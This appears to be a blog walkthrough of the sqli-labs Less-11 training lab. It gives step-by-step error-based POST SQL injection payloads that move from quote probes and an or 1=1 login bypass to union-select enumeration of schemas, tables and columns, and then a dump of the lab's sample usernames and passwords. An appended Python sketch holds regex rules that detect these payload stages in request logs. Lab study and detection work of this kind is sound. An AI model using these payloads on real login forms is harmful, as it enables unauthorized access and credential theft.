sqli-labs Less-11

Less-11 POST - Error Based - Single quotes - String

0x01. Original page

Inspecting the page elements shows that the username and password are submitted as two parameters, uname and passwd.

Enter the correct username and password.

The page echoes the login data correctly.

Enter an incorrect username and password.

0x02. Analyzing the injection type
uname=1 passwd=1
uname=1" passwd=1
uname=1' passwd=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' LIMIT 0,1' at line 1

The error message shows that the string in the query is delimited by single quotes, so a single quote closes it.

0x03. Analyzing the injection point
Universal password: uname=1' or 1=1 #

Data is returned.

uname=admin' and '1'='2
The page returns no data, which confirms that the uname parameter is vulnerable to SQL injection.

0x04. Determining the number of fields
uname=admin' order by 3 #
(# comments out the rest of the SQL statement)

An error is returned, so the number of fields is not 3; continue testing.

uname=admin' order by 2 #
(# comments out the rest of the SQL statement)

Data is displayed correctly, so the query returns 2 fields. This does not mean the table itself has 2 fields.

0x05. Query version
uname=-1' union select 1,version() #

0x06. Querying the database
uname=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata) #

Your Password:information_schema,challenges,cms,dvwa,espcms_v5,mysql,performance_schema,pikachu,security,sqltest,test

0x07. Querying the tables in the database
uname=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security") #

Your Password:emails,referers,uagents,users

0x08. Querying the table columns

uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

Your Password:id,username,password

0x09. Obtaining the values
uname=-1' union select 1,(select group_concat(username,0x3a,password) from users) #

Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4,admin'-- -:123456
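
Added example (not part of the original post): a detection sketch that labels each login request by the stage of the walkthrough above that its uname or passwd value resembles, which is how steps 0x02 to 0x09 would surface in a request log. The log line format, the /Less-11/ path, the client addresses and the rule names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlencode

# Most specific stage first; the first rule that matches names the request.
RULES = [
    ("schema-enumeration", re.compile(r"\binformation_schema\b")),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("column-count", re.compile(r"\border\s+by\s+\d+")),
    ("boolean-test", re.compile(r"['\"]\s*(or|and)\s+['\"]?\w+['\"]?\s*=")),
    # Low confidence: a lone quote also occurs in legitimate input (O'Brien).
    ("quote-probe", re.compile(r"['\"]")),
]

def classify(value):
    """Return the walkthrough stage a field value resembles, or None."""
    text = re.sub(r"\s+", " ", value.lower())  # fold case and whitespace
    for stage, pattern in RULES:
        if pattern.search(text):
            return stage
    return None

def scan(log_lines, fields=("uname", "passwd")):
    """Return (client, field, stage) for every suspicious login field."""
    hits = []
    for line in log_lines:
        parts = line.split(" ", 3)
        if len(parts) != 4 or parts[1] != "POST":
            continue  # malformed line or not a form submission
        params = parse_qs(parts[3], keep_blank_values=True)
        for field in fields:
            for value in params.get(field, []):
                stage = classify(value)
                if stage:
                    hits.append((parts[0], field, stage))
    return hits

# Constructed log line format: client, method, path, form-encoded body.
def sample_line(client, uname, passwd="1"):
    return f"{client} POST /Less-11/ " + urlencode({"uname": uname, "passwd": passwd})

# Constructed sample input; the uname values are taken from the steps above.
SAMPLE_LOG = [
    sample_line("198.51.100.7", "Dumb", "Dumb"),
    sample_line("203.0.113.9", "1'"),
    sample_line("203.0.113.9", "1' or 1=1 #"),
    sample_line("203.0.113.9", "admin' order by 3 #"),
    sample_line("203.0.113.9", "-1' union select 1,version() #"),
    sample_line("203.0.113.9", "-1' union select 1,(select group_concat(schema_name) from information_schema.schemata) #"),
]
print(*scan(SAMPLE_LOG), sep="\n")
```

A run of escalating stages from one client against the same login form is a much stronger signal than any single match, the quote-probe rule least of all.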

Origin blog.csdn.net/qq_42630215/article/details/105115842